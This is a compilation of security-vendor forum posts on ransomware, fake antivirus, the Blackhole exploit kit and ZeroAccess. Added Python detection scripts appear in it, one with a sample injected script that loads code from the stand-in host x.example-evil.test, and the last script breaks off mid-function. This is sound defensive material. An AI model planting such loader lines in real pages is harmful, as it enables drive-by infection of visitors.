Top Threats

19 Posts

“Your PC is blocked”: Background of the Police Ransomware Virus 

 

Reveton – the universal extortion instrument

 

Researchers have been investigating not just the intricacies of the malware code that these ransomware programs deploy to infect your computer, but the money trail that is left by those who either don't know where to turn for help, or are intimidated by the threats included in the ransomware's blocking screen.

 

A French security expert and blogger known by the handle Kafeine and his colleagues from the botnets.fr project have managed to access a BlackHole exploit panel associated with Reveton distribution.

 

Blackhole and Styx exploit kits are often used to infect systems with this ransomware, and the most effective means of infection is by exploiting weaknesses in Java. The control panel shows this clearly.

breakdown-of-statistical-data.png

 

Once a system is infected there is always the possibility that the user will look for ways to remove it, either by searching the internet for removal guides or by seeking help online in one or other of the self-help forums. Probably only rarely will a user pay to have the infection removed, since the cost of doing so is likely to be nearly as much as the ransom demanded, and the fear and embarrassment factor will militate against allowing outsiders to have access to the system.

 

What this means is that the success rate, for the ransomware distributors, is going to be less than they might hope for (which is why some of them are now resorting to encrypting files). The proportion of users who pay the ransom seems to differ from country to country, but the calculations derived from access to the control panel indicate that the controllers can count on receiving about 40,000 Euros per day. And that is from just one operation among many.

 

revenue-from-european-countries.png

 

The money, of course, has to be laundered to get it back to the controllers, and they will expect to receive only a part of that 40,000 Euros. Laundering money costs money. Assuming that half of that amount goes to intermediaries, they will still get in the region of 7 million Euros a year for their efforts.

 

Kafeine from botnets.fr has outlined the entire infrastructure of Reveton distribution and monetizing details in the following graphic:

infrastructure-of-reveton-distribution-and-monetizing.png

These screenshots were taken from the privacy-pc.com report (see below), which has a link to an earlier analysis of the FBI Moneypak ransomware containing removal guides.

 

http://privacy-pc.com/news/your-pc-is-blocked-background-of-the-police-ransomware-virus.html


Compromised websites have been an attractive target for cyber-criminals. These websites distribute different malware designed to steal valuable information from the victim's machine.

Compromised websites host scripts or iframes that redirect to, or download, other malware.

fakeav1.jpg      fakeav2.jpg

The link to the compromised website may arrive via email as part of a spam campaign to lure the user into clicking the malicious link. After accessing the compromised website, it shows a fake message box about critical process activity on the computer.

fakeav3.jpg

On clicking the OK button, it opens a .PNG file hosted on the compromised site. This .PNG file shows a fake alert image that pretends to be from a security product, scaring the user into thinking the computer is infected by critical malware and suggesting that the user clean the computer.

fakav4.jpg

The compromised website has another iFrame that allows downloading a malicious file when the user attempts to click on the .PNG file.

fakeav5.jpg

Upon executing the malicious file, it shows a variety of fake security alerts and warnings. Also, this rogue variant uses a different GUI depending on the version of the operating system it infects.

fakeav6.jpg

On Windows 7:

fakeav7.jpg

On Windows Vista:

fakeav8.jpg

Finally, it attempts to convince the user to purchase the full version of the fake product.

McAfee strongly recommends that users exercise caution when opening unsolicited emails. Ensure your anti-malware protection is up to date. Use a reputable firewall. Beware of drive-by downloads when visiting any new websites. McAfee detects this malware as “FakeAlert-FFO” and the .jar file as “Exploit-CVE2012-1723”.


A new version of RootkitRemover is now available : http://www.mcafee.com/us/downloads/free-tools/rootkitremover.aspx

 

The new version contains some excellent ZeroAccess removal features.

 

We very much value your feedback, so please do let us know if you use the tool and if it solved your issue.

 

Thanks!

If you use the internet (and if you're reading this then it's pretty safe to assume you do) then you run the risk of your machine getting infected with malware. Infection vectors are wide and varied, and even a website that you've visited 1000 times before and you thought was safe could be loaded with malware the next time you click. There are some great documents and discussions on this site on how to stay protected, but even with the best defence mechanisms there is still unfortunately a chance that something nasty will slip through the net.

 

Most malware these days, somewhere down the line, is money-driven - be it from attempting to swindle you into buying fake anti-virus "software" or paying ransom money to have your files decrypted (and then selling on your credit card details too), or by stealing your online banking password or intercepting transactions in the browser. And where there's an illicit opportunity to make money, there will generally be people willing to take that opportunity - so the new malware just keeps on coming.

 

Some infections are easy to spot - if you have Fake-AV or Ransomware then you'll know about it. Others are stealthier and lurk in the background doing their best to go unnoticed, and it's only when you check your bank balance that you see something untoward has occurred.

 

There is help at hand though, it's totally free and it's available for you to use if you think you've got an infection on your pc:

 

Stinger is McAfee Labs' free standalone removal tool - it is released on a daily basis and at the time of typing this it covers nearly 6000 malware families, including Vundo, Autorun.worm, Xpaj, ZeroAccess, Blacole, Zeus and a whole host of FakeAlerts, Backdoors, downloaders, password stealers and banking trojans.

 

It might just be the droid you were looking for....


W32/Autorun.worm.aaeb-h

Posted by SamSwift Nov 30, 2012

McAfee has received multiple reports of corporate customers who are severely affected by variants of W32/autorun.worm.aaeb-h.

 

Impact:

W32/Autorun.worm.aaeb-h has the ability to infect removable media devices and mounted network shares. It can also copy itself into .zip and .rar archive files.

The infection starts either with manual execution of an infected file or by navigating to a folder that contains infected files. This threat has the ability to download other malware or updates to itself as directed by a Command-and-Control (C&C) server.

This threat is server-side polymorphic, therefore there is potential for new variants. McAfee Labs are continuing to closely monitor the situation and will provide enhanced generic detection as needed.

 

Mitigation:

Coverage for the majority of variants is in the current DAT update files; however, McAfee have also released an additional Extra.DAT and Stinger to detect and clean this threat.

To download the Extra.DAT and Stinger, see KB76807:
https://kc.mcafee.com/corporate/index?page=content&id=KB76807

 

For more information on McAfee product coverage and mitigation for this threat, see PD24169 - Threat Advisory: W32/Autorun.worm.aaeb:
https://kc.mcafee.com/corporate/index?page=content&id=PD24169
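Two checks a responder can run offline against media or a share hit by a worm of the kind described in the post above, added here as an example (this is not McAfee's tooling or code from the post): the first lists every command an autorun.inf would launch, the second opens a .zip and reports members whose content is a PE image regardless of what the file name claims, which is how a worm that copies itself into archives gets spotted. The autorun.inf text, the RECYCLER path and the archive contents are constructed for the example.

```python
"""Added example, not code from the McAfee post: two offline checks for the
Autorun-style spread described above. parse_autorun_inf() lists every command
an autorun.inf would launch; pe_members() opens a .zip and reports members whose
content is a PE image, whatever the file name claims. Sample inputs are
constructed; the RECYCLER path and file names are made up."""
import io
import re
import zipfile
from typing import Dict, List

# [autorun] keys that cause code to run when the volume is mounted or opened
LAUNCH_KEYS = ("open", "shellexecute")
SHELL_CMD_RE = re.compile(r"^shell\\[^\\]+\\command$", re.I)


def parse_autorun_inf(text: str) -> Dict[str, str]:
    """Return {key: command} for every launch directive in the [autorun] section."""
    launches: Dict[str, str] = {}
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.lower() in LAUNCH_KEYS or SHELL_CMD_RE.match(key):
            launches[key.lower()] = value
    return launches


def pe_members(zip_bytes: bytes) -> List[str]:
    """Names of archive members whose first two bytes are the 'MZ' DOS header."""
    hits: List[str] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:          # read only the header, not the whole member
                if fh.read(2) == b"MZ":
                    hits.append(info.filename)
    return hits


# Constructed autorun.inf: the worm registers itself for AutoRun, double-click and Explore.
SAMPLE_AUTORUN_INF = r"""
[autorun]
icon=setup.ico
label=USB Drive
open=RECYCLER\S-1-5-21-1\uqcxmtpl.exe
shell\open\command=RECYCLER\S-1-5-21-1\uqcxmtpl.exe
shell\explore\command=RECYCLER\S-1-5-21-1\uqcxmtpl.exe
"""


def build_sample_zip() -> bytes:
    """Constructed archive: a text file plus PE images, one renamed to look like a document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.txt", "quarterly figures\n")
        zf.writestr("Q3 report.doc", b"MZ\x90\x00" + b"\x00" * 60)   # DOS header, fake body
        zf.writestr("installer.exe", b"MZ\x90\x00" + b"\x00" * 60)
    return buf.getvalue()
```

On a mounted volume the first check is `parse_autorun_inf(open(r"E:\autorun.inf", errors="replace").read())`; on the host side, setting `NoDriveTypeAutoRun` to `0xFF` under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer` disables AutoRun for every drive type, so the `open=` line is never honoured. The archive check is deliberately content-based: a worm that copies itself into a .zip picks whatever name it likes, but it cannot avoid the `MZ` header.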

Blackhole detections 2H2011.JPG

 

The Blackhole Exploit kit has received a complete makeover. The authors have completely rewritten the code in order to evade detection by the majority of anti-virus programs. This exploit kit is probably the most successful (and, for PC users, most dangerous) piece of malware around at the moment, and it relies for its success on users who haven't updated operating systems, browsers, and widely-used applications such as Flash, Adobe Reader and Java.

 

http://www.infoworld.com/t/malware/blackhole-exploit-kit-gets-upgraded-evade-antivirus-software-202263

The creators of the infamous Blackhole exploit kit have announced version 2.0 of the malware, claiming to have rewritten the code entirely from scratch so as to evade popular antivirus software. The kit includes noteworthy and nasty tricks, such as the use of short-term, random URLs for delivering exploits, but perhaps in recognition of the still-struggling global economy, the kit's creators aren't changing pricing.

 

According to Sophos, the Blackhole exploit kit is "the most popular drive-by malware we've seen recently.... It offers sophisticated techniques to generate malicious code. And it's very aggressive in its use of server-side polymorphism and heavily obfuscated scripts to evade antivirus detection. The end result is that Blackhole is particularly insidious."

 

In the past few months alone, malicious hackers have used Blackhole to exploit an unpatched MSXML flaw; to exploit Java vulnerabilities; to infect users with fake AV (antivirus) programs via Twitter spam campaigns; and to distribute the GameOver Trojan via a fake U.S. Airways-themed email campaign.

Blackhole 2.0 also has been trimmed of old exploits that have since been fixed, replacing them with a new batch. Further, the creators have broadened the number of OSes the malware can recognize, adding to the list Windows 8 and unspecified mobile platforms, "giving the attacker the ability to break down the amount of traffic he's getting from machines running each individual OS".

 

The exploit kit is customisable, so the list of exploits given in the InfoWorld article above is certainly incomplete.

Top exploits 1H12.bmp

The latest Security Intelligence Report from Microsoft (vol. 13) has this to say about the exploit kit in its Summary Section -

Blacole, a family of exploits used by the so-called “Blackhole” exploit kit to deliver malicious software through infected webpages, was the most commonly detected exploit family in the first half of 2012.

 

Prospective attackers buy or rent the Blacole kit on hacker forums and through other illegitimate outlets. It consists of a collection of malicious webpages that contain exploits for vulnerabilities in versions of Adobe Flash Player, Adobe Reader, Microsoft Data Access Components (MDAC), the Oracle Java Runtime Environment (JRE), and other popular products and components. When the attacker installs the Blacole kit on a malicious or compromised web server, visitors who don’t have the appropriate security updates installed are at risk of infection through a drive-by download attack.

 

These attacks frequently use Javascript or IFrames to execute a drive-by attack, one in which simply visiting a compromised website is sufficient to activate the malicious code and download malware to a user's system.

 

A drive-by download site is a website that hosts one or more exploits that target specific vulnerabilities in web browsers, and browser add-ons. Malware distributors use various techniques to attempt to direct Internet users to Web sites that have been compromised or are intentionally hosting hostile code. Users with vulnerable computers can be secretly infected with malware simply by visiting such a website, even without attempting to download anything themselves.

 

This technique usually involves posting exploit code to a legitimate website, either by gaining access to the site through intrusion or by posting malicious code to a poorly secured Web form, like a comment field on a blog. In most cases, the exploit code itself is hosted on a different website and is exposed through the compromised webpage using a technique like a URL embedded in malicious script code or an inline frame, called an IFrame for short. An IFrame is an HTML document that is embedded in another HTML document.

 

During a drive-by download attack, an IFrame is typically used to load a separate HTML page into a window on the current page. Inline frames can be as small as a single pixel making them impossible to detect with the naked eye. Because the IFrame loads another webpage, it can be used by criminals to place malicious HTML content, such as a script that downloads and installs malware, into non-malicious HTML pages hosted by trusted websites.

 

(Microsoft Security Blog, December 8 2011)

Further information:

 

"What You Should Know About Drive-By Download Attacks - Part 1" (Microsoft Security Blog, December 8 2011)

"Same Operation, Diversification of Targets Being Spoofed: Current Black Hole Exploit Kit Spam Runs"  (Trend Micro, June 12)

"The Rise of the “Blackhole” Exploit Kit: The Importance of Keeping All Software Up To Date" (Microsoft Security Blog, July 19)

"Voice Mail Notifications and ADP Emails Lead to Blackhole Exploit Kit"  (Websense, September 13)

"Blackhole Exploit Kit updates to 2.0 "  (Websense, September 13)

"Blackhole 2.0 Beta Tests In The Wild?"  (Trend Micro, September 14)

"The various spam campaigns leading to Blackhole"   (Help Net Security)

 

"McAfee Labs Threat Advisory - Blackhole Exploit Kit"

Microsoft Encyclopedia entry : JS/Blacole

Microsoft Encyclopedia - detailed description of JS/Blacole


"Microsoft Security Intelligence Report Vol. 13"

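The iframe and redirect mechanics described in the Microsoft excerpt above, and the compromised-site chain in the earlier FakeAlert post (a script or iframe on a legitimate page pulling the payload from another host), can be checked for statically once a page has been fetched. The following is an added example, not code from either post or from Microsoft: it scans HTML for iframes that are one pixel in size, hidden by CSS or positioned off-screen, iframes that load a host other than the page's own, and inline scripts that decode and write markup at runtime. The page body and the hostnames in it are constructed.

```python
"""Added example, not code from the McAfee post or the Microsoft material it
quotes: a static audit of a fetched HTML page for the drive-by patterns described
above (tiny or CSS-hidden iframes, frames that pull in a third-party host, and
scripts that decode and write markup at runtime). The page body and hostnames
below are constructed."""
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlparse

HIDDEN_CSS = re.compile(r"display:none|visibility:hidden|(?:left|top):-\d{3,}")
RUNTIME_WRITE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(|String\.fromCharCode\s*\(|eval\s*\(\s*unescape\s*\(")

Finding = Tuple[str, List[str]]


def _px(value: Optional[str]) -> Optional[int]:
    """'1', '1px', ' 0 ' -> int; percentages or missing -> None."""
    if value is None:
        return None
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value)
    return int(m.group(1)) if m else None


class DriveByAuditor(HTMLParser):
    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings: List[Finding] = []
        self._script: Optional[List[str]] = None     # collects text of the open <script>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            reasons = []
            w, h = _px(a.get("width")), _px(a.get("height"))
            if w is not None and h is not None and w <= 1 and h <= 1:
                reasons.append("frame is %dx%d px" % (w, h))
            if HIDDEN_CSS.search(a.get("style", "").lower().replace(" ", "")):
                reasons.append("hidden by CSS")
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            if host and host != self.page_host:
                reasons.append("loads third-party host " + host)
            if reasons:
                self.findings.append((a.get("src", ""), reasons))
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            if RUNTIME_WRITE.search("".join(self._script)):
                self.findings.append(("<inline script>", ["decodes and writes markup at runtime"]))
            self._script = None


def audit_page(html: str, page_host: str) -> List[Finding]:
    """Return (src, reasons) for every iframe or script that matches a drive-by pattern."""
    auditor = DriveByAuditor(page_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed page: a legitimate blog with an injected 1x1 frame and loader script.
SAMPLE_PAGE = """<html><body>
<h1>Company news</h1>
<iframe src="https://www.example-blog.test/widgets/weather" width="300" height="120"></iframe>
<iframe src="http://cdn-stats.example-evil.test/in.php" width="1" height="1"
        style="position:absolute; left:-2000px;"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://x.example-evil.test/l.js%22%3E%3C/script%3E'));</script>
</body></html>
"""
```

Run `audit_page(html, "www.example-blog.test")` over the fetched body and treat every finding as a lead, not a verdict: legitimate sites use third-party frames for analytics and advertising, so the useful signal is the combination (tiny, hidden and third-party at once) or a script that only produces its markup after decoding, which is the server-side-polymorphic loader Sophos describes.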

McAfee Labs' own Peter Szor and Guilherme Venere have written two excellent blogs around these attacks:

 

http://blogs.mcafee.com/enterprise/security-perspectives/skywiper-fanning-the-flames-of-cyber-warfare

 

http://blogs.mcafee.com/mcafee-labs/jumping-in-to-the-flames-of-skywiper

 

Today's Stinger will contain coverage for W32/Skywiper, also detection is already available in our DAT files.

 

Our ThreatCenter has further information which can be found here.

 

Skywiper page now available on McAfee.com and McAfee Labs whitepaper

************************

Update:

 

New blogs posted from Francois Paget, Peter and Guilherme:

 

http://blogs.mcafee.com/mcafee-labs/what-the-skywiper-files-tell-us

 

http://blogs.mcafee.com/mcafee-labs/spreading-the-flame-skywiper-employs-windows-update

 

Threat Advisory available in the McAfee ServicePortal here

 

************************


computer-crime-fake (1).png

 

This is one member of an entire family of malware known as ransomware.  The aim of those producing and spreading this ransomware is to intimidate and blackmail users whose PCs are infected and persuade or force them to pay for having the malware removed or neutralised. As a form of cybercrime it is crude, but often effective - often enough that the authors have gone to some lengths to customise this particular variety for different countries in Europe (so far, only a few examples from outside Europe have been seen).

 

The basic mechanism is simple enough. A PC is infected with a Trojan dropper by visiting an infected website. The actual infection can be the result of a "drive-by", where simply going to an infected webpage is enough to download the Trojan. Once on the PC, the code inserts a registry entry to make sure that it will be run every time the PC starts up, then displays a country-specific picture and a message (completely obscuring the desktop) and apparently locks the PC.  The full details are in a paper by Trend Micro, which explains it better than I can.

 

Newer variants of this ransomware are said to have been modified to encrypt files and overwrite the MBR. If that is true, it confirms that the authors are actively developing it and intend to keep it going as long as  possible.

 

One of the first articles to draw attention to this ransomware appeared last December in Microsoft's Malware Protection Center, when most of the infections were being reported from Germany (the BundesPolizei variant) :

http://blogs.technet.com/b/mmpc/archive/2011/12/19/disorderly-conduct-localized-malware-impersonates-the-police.aspx

 

Considering the wide distribution of scams such as this ransomware, it's clear that there's a lot of money at stake. That's why the bad guys invest in making their scams look more convincing for the unsuspecting user. This includes adapting social engineering techniques to the specifics of various countries and pretending to be the local authorities. Another point to remember is that a lot of malware is distributed nowadays through exploit kits such as Blackhole.

 

The note above about the Blackhole Exploit Kit is confirmed by a forum post, dated a fortnight before this article appeared, which said that

 

... Microsoft security essentials showed up 2 severe threats:

Exploit.java/Blacole.BX - severe

Trojan:Win32/Reveton.A

 

Trojan/Win32/Reveton was the subject of another article in Malware Protection Center on April 18th : "Revenge of the Reveton". The malware infection is classed by Microsoft as Severe, and a description and removal guide can be found HERE. It is important to note that this infection is the intermediate variant that purports to be from the Metropolitan Police : later variants may require a different removal process.

 

Trojan:Win32/Reveton.A arrives as a DLL file with a random name. It creates a shortcut file to itself in the Windows startup folder; the shortcut file name is the same name as the DLL file but with the LNK extension.

 

When Windows starts, it executes the command associated with the shortcut, as follows:

rundll32.exe <path>\<file name>.dll, <random exported name>

Payload

Prevents the user from accessing the desktop

When run, Trojan:Win32/Reveton.A displays a full-screen webpage that covers all other windows, rendering the computer effectively unusable. The image is a fake warning pretending to be from a legitimate institution. It demands the payment of a supposed fine. However, even if the user pays, the computer is still left unusable.

 

Downloads and executes other malware

Trojan:Win32/Reveton.A downloads and executes other malware, detected as PWS:Win32/Reveton.A.

 

What Microsoft calls PWS:Win32/Reveton.A is a refinement apparently added to this ransomware variant :

This threat is classified as a password-stealing trojan. Typically, a password stealing trojan installs a keystroke logger (commonly referred to as a keylogger) which records keystrokes and sends the recorded information to remote attackers. Some keyloggers monitor only keystrokes involved in specific types of web-based transactions. For example, a keylogger may include a component that monitors browser activity, only recording keystrokes when certain bank or ecommerce sites are accessed. Other types of password-stealing trojans include those that capture screenshots in an attempt to bypass graphic-based security measures.

 

The advice to anyone who has fallen victim to this version of the ransomware is the usual :

 

What to do if you think you have been a victim of a scam

If you suspect that you've responded to a phishing scam with personal or financial information, take these steps to minimize any damage.

  • Change the passwords or PINs on all your online accounts that you think might be compromised.
  • Place a fraud alert on your credit reports. Check with your bank or financial advisor if you're not sure how to do this.
  • Contact the bank or the online merchant directly. Do not follow the link in the fraudulent email message.
  • If you know of any accounts that were accessed or opened fraudulently, close those accounts.
  • Routinely review your bank and credit card statements monthly for unexplained charges or inquiries that you didn't initiate.

The whole subject of these "Police Trojans" has been investigated in depth by Trend Micro, who published their findings in a White Paper. The blog entry where the White Paper is discussed asserts that the same people are likely to be behind this as were responsible for a DNSChanger Trojan that had been sponsored by Rove Digital. That particular group was taken down last November when 8 Estonians were arrested, but the Police Trojans continue to be modified, enhanced and released - so there are others involved. There are clues within the source code, apparently, that point to Russian-speakers as being the authors of this malware (although such "clues" could be deliberately planted in order to mislead the investigators).

 

The Trend Micro blog is at http://blog.trendmicro.com/trojan-on-the-loose-an-in-depth-analysis-of-police-trojan/

 

The DNSChanger Trojan is the same one that has recently been in the news : the FBI's Operation Ghost Click, which was the subject of a recent post in Security Awareness ("Did the FBI say we should check to see if computer is infected?")

 

The story of the takedown of Rove Digital and its criminal operations - spam, fake pharmaceuticals and malware - can be found at http://blog.trendmicro.com/esthost-taken-down-biggest-cybercriminal-takedown-in-history

 

The White Paper

(http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_police_trojan.pdf)


This analyses the operation and external communications of the Police Trojans in some detail. It also provides an explanation for the patchy detection rate by anti-virus programs, and the difficulty in keeping track of changes to the Trojans :

... there must be an affiliate download site where partners can download a ready-made Trojan using their own user names and the C&C server of the day already embedded. This also explains the very low detection rates across the board. Each Trojan is custom compiled with different configurations and applies two layers of packing and obfuscation on top. Given the rate at which the attackers are changing C&C servers, this recompilation must be happening very often that is why security companies are having a difficult time obtaining good detections.

 

The cybercrime activities of the authors of this ransomware are identified, showing that these are professional (or at least semi-professional) cybercrooks -

The gang spreading the ransomware discussed in this research paper does not seem to be a novice in committing cybercrime. In fact, we can relate the ransomware Trojan to several data-stealing campaigns involving ZeuS and CARBERP Trojans, TDSS rootkits, and FAKEAV malware dating back to 2010 and 2011. We can also relate the Police Trojan gang to a ZeuS Trojan campaign launched in mid-March of this year and a Gamarue worm.

 

.... The TDSS samples we have seen in Police Trojan attacks were also the DNS changers Rove Digital’s affiliate program used. As such, we believe that one or some of the gang members spreading the Police Trojans may also have been members of Rove Digital’s affiliate program in the past. This shows that the gang is certainly not new to cybercrime.

 

The probable source(s) of infection are set out at the end of the White Paper. The authors' conclusions about the websites that cause the infection should come as no surprise.

 

These malware programs tend to exploit known vulnerabilities in programs such as Java and Flash, for which updates are available but may not have been downloaded and applied. Some can exploit security weaknesses in Windows (most often XP); if the fixes for these issues by Microsoft are in the Optional download section (unlikely, but possible) then some users may not be aware of them.

 

To check whether your PC is missing any Windows or other Microsoft updates you should go to the Microsoft Update website (for which you must be using Internet Explorer; go to the Microsoft Download Center if you are using another browser such as Chrome or Firefox) or run Microsoft's MBSA, which scans for a number of security vulnerabilities in your OS and browser. For Adobe Flash, you can check whether you have the latest version here (different versions must be downloaded for IE and Firefox; Chrome should update its own sandboxed version automatically).

 

West Yorkshire Police virus.jpg

 

As a footnote to this piece, I note that there is a recent ransomware variant - purporting to be from West Yorkshire Police here in the UK - which has some extra features missing from earlier variants. Many files are encrypted - including .doc and .pdf - and are given a prefix of 'Locked' and a random 4-character suffix. A Russian AV vendor (Dr.Web) classifies this variant of the ransomware as "Trojan.Matsnu.1" and can decrypt the files, provided that they receive both an encrypted file and its unencrypted (pre-infection) version. This implies that the file has been backed up and so is available for comparison - which reinforces the message that files should be backed up  regularly.


Innovative Marketing, a notorious purveyor of Fake AV programs, has finally been persuaded - under extreme pressure - to reimburse a large number of people who were duped by their "Your PC is infected ..." scareware into buying their worthless programs.

 

The company had its headquarters in the Ukraine, but with subsidiaries in the United States and elsewhere. The refunds appear to be for victims in the US only, where the FTC took action against the company in 2008.

 

In the US, at least 320,000 people will receive a refund of about $20. The figure of 320,000 represents only those in the US who are known to have paid Innovative for one of their scareware products : the list of those products is extensive, since the same underlying program code would have numerous user interfaces and product names.

 

The number of people eligible for a refund is expected to grow, since the FTC is inviting anyone who paid for one of Innovative's "antivirus" programs, and who does not receive a refund, to contact them.

 

Anyone outside the US has very little chance of ever receiving any compensation.

 

A list of some of the names of the Fake AV and other programs peddled by Innovative Marketing can be found on the Microsoft website at

http://blogs.technet.com/b/mmpc/archive/2011/12/14/ftc-to-refund-rogue-security-software-victims.aspx

 

Some of the names used :

SpyGuarder

SpyKiller Pro

Spyware Sweeper

SpywareIsolator

SwiftCleaner

SystemDoctor

SystemErrorFixer

SystemSweeper

TotalAntivirus

Trasheraser

Trustedprotecion

UltimateCleaner

VirusRemover 2008

WinAntiSpyware

WinAntiVirusPro

WinBugFixer

WinDefender2008

WinFixer

Winsecureav

WinSpyware Protect

WinxDefender

XLifeGuarder

XP AntiSpyware 2009

XP AntiVirus

 

A brief news article about this happy event, with some of the historical background, is at

http://www.pcworld.com/article/246366/ftc_compensates_320000_victims_of_fake_antivirus_scams.html

 

The FTC announcement can be found at http://www.ftc.gov/opa/2011/12/rebates.shtm


OpenCloud Security FakeAlert is commonly found to be installed by other trojan downloaders. These trojans usually arrive as e-mail attachments, or via drive-by download attacks exploiting vulnerabilities in Windows and third-party applications.

Upon execution, it copies itself to the following paths:

  • %USERPROFILE%\Application Data\OpenCloudSecurity\OpenCloud Security.exe
  • %ALLUSERSPROFILE%\Application Data\OpenCloud Security\OpenCloud Security.exe

This FakeAlert evolves its appearance and may present itself using one of the following graphical user interfaces:

avsec1.jpg

This infection will also terminate the majority of programs that you attempt to run.

When you start an executable it will automatically be closed, and you will then be shown a security warning from the Windows taskbar stating that the program is infected.

 

avsec2.jpg

While running, this fakealert will display a variety of fake security alerts and warnings. The various alerts are shown below:


avsec3.jpgavsec6.jpg

 

avsec7.jpg

 

Mitigation:

 

  • Users should be cautious with suspicious e-mail attachments.
  • Users should apply the latest security patches for Windows and third-party applications including the following, which are popular targets:
    • Internet Explorer
    • Microsoft Office (Excel, Word, PowerPoint, etc.)
    • Adobe Reader
    • Java
    • Flash Player
    • RealPlayer
    • QuickTime
  • Users should browse cautiously and avoid unknown sites.

 

Note: If you are already infected with this fakealert and not able to execute anything, start the machine in 'Safe Mode with Networking' and run the McAfee FakeAlert Stinger <http://www.mcafee.com/us/downloads/free-tools/fake-alert-stinger.aspx>.

Set the sensitivity level to 'Very High'; it is 'Very Low' by default.


The threats are also “protecting” themselves.

 

The most recent is part of a family of rootkits. ZeroAccess, as it is called, replaces Windows system files and installs kernel hooks in an attempt to remain stealthy. ZeroAccess utilizes an advanced method for protecting itself and disabling any security tool trying to detect and remove it.

 

ZeroAccess is usually installed on a system by a malicious executable disguised as a cracking tool for popular applications. Once this dropper is executed, it will perform some actions like:

 

  • The rootkit will create a file with a random name in %SYSTEMROOT%\system32\config\<random> or c:\windows\prefetch\<random>. This file will be used to store a virtual encrypted file system, used by the rootkit to store its configuration files and other supporting files.
  • ZeroAccess will then patch a randomly chosen system driver file. The patched file will be used as the rootkit’s restart mechanism to load its malicious kernel component when the system boots.
  • The original system driver file is stored inside the virtual file system. The rootkit uses it to provide legitimate information for requests to access the original file information on disk such as md5, digital signature, including a file copy.
  • The malware will also create a tripwire device. This device is disguised as a normal file on disk, but whenever accessed, it will trigger the rootkit protection routine.
  • In older variants, the tripwire device used to be named like \\??\Global\systemroot\system32\svchost.exe.
  • In new variants, the tripwire device is installed in an Alternate Data Stream (ADS).

               NOTE: An ADS is an NTFS structure that allows more than one data stream to be associated with a file.

  • The rootkit tripwire device ADS is usually installed as %SYSTEMROOT%\<randomnumbers>:<randomnumbers>.exe.

               Example: \systemroot\3155945044:2870600771.exe

  • The malware then creates a service, and points its ImagePath to the tripwire device, to run it every time the system boots.
  • Whenever the tripwire file or the process in memory is accessed by a security tool, the rootkit kernel component will kill the process from the kernel.
  • In newer variants, besides killing the process, the rootkit component will also remove all NTFS permissions from the offending files. This action is an attempt to disable security related tools and components.

 

ZeroAccess also establishes network activity, reporting the installation and user activity to a remote server. Since the rootkit hides network connections from any tool running on the infected machine, system administrators may need to use external monitoring tools to check the network activity.

 

We are seeing ZeroAccess associated with other malware families, such as FakeAlert and Katusha.

 

For more details of this threat and remediation steps, please read here.

 

Be Safe Today, Not Tomorrow !!!!

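Two of the ZeroAccess artifacts listed above are cheap to hunt for once the data is taken off the live host (the rootkit hides its objects from tools running on the infected machine, so read the hive or disk offline): a service whose ImagePath is an NTFS alternate data stream such as `\systemroot\3155945044:2870600771.exe`, and files in `system32\config` or `Prefetch` that Windows did not put there. The following is an added example, not McAfee's tooling or code from the post. The registry text is constructed in the format `reg query HKLM\SYSTEM\CurrentControlSet\Services /s /v ImagePath` prints; the service name `93ab0f21` and the Prefetch entries are made up, and the allow-list of legitimate Prefetch files assumes Windows 7.

```python
r"""Added example, not McAfee's tooling: triage of two ZeroAccess artifacts named
above, working from data exported off the suspect machine. The text below is
constructed in the format of `reg query HKLM\SYSTEM\CurrentControlSet\Services
/s /v ImagePath`; service and file names are made up; the Prefetch allow-list
assumes Windows 7 and must be adapted for other builds."""
import re
from typing import Dict, List

KEY_LINE = re.compile(r"^HKEY_[A-Z_]+\\(.+)$")
VALUE_LINE = re.compile(r"^\s+ImagePath\s+REG_(?:EXPAND_)?SZ\s+(.*?)\s*$")
# "<file>:<stream>" after the last backslash is an NTFS alternate data stream
ADS_TAIL = re.compile(r"^(?P<file>[^\\:]+):(?P<stream>[^\\:]+)$")
# What Windows 7 itself keeps in \Windows\Prefetch (assumption: adjust per OS build)
PREFETCH_OK = re.compile(
    r"^(?:.+-[0-9A-F]{8}\.pf|layout\.ini|ag[a-z_]*\.db|pfsvperfstats\.bin|readyboot)$", re.I)


def parse_reg_query(text: str) -> Dict[str, str]:
    """{service name: ImagePath} from `reg query ... /s /v ImagePath` output."""
    services: Dict[str, str] = {}
    current = None
    for line in text.splitlines():
        m = KEY_LINE.match(line)
        if m:
            current = m.group(1).rsplit("\\", 1)[-1]
            continue
        m = VALUE_LINE.match(line)
        if m and current:
            services[current] = m.group(1)
    return services


def triage_image_path(image_path: str) -> List[str]:
    """Reasons an ImagePath matches the ZeroAccess tripwire/loader pattern."""
    reasons: List[str] = []
    path = re.sub(r'^"?\\\?\?\\(?:Global\\)?', "", image_path.strip(), flags=re.I)  # drop NT prefixes
    tail = path.rsplit("\\", 1)[-1].strip('"')
    ads = ADS_TAIL.match(tail)
    if ads:
        reasons.append("ImagePath is an alternate data stream %s:%s"
                       % (ads.group("file"), ads.group("stream")))
        if ads.group("file").isdigit() and re.fullmatch(r"\d+\.exe", ads.group("stream"), re.I):
            reasons.append("numeric file and stream names match the ZeroAccess naming")
    if re.search(r"\\(?:system32\\config|prefetch)\\", path, re.I):
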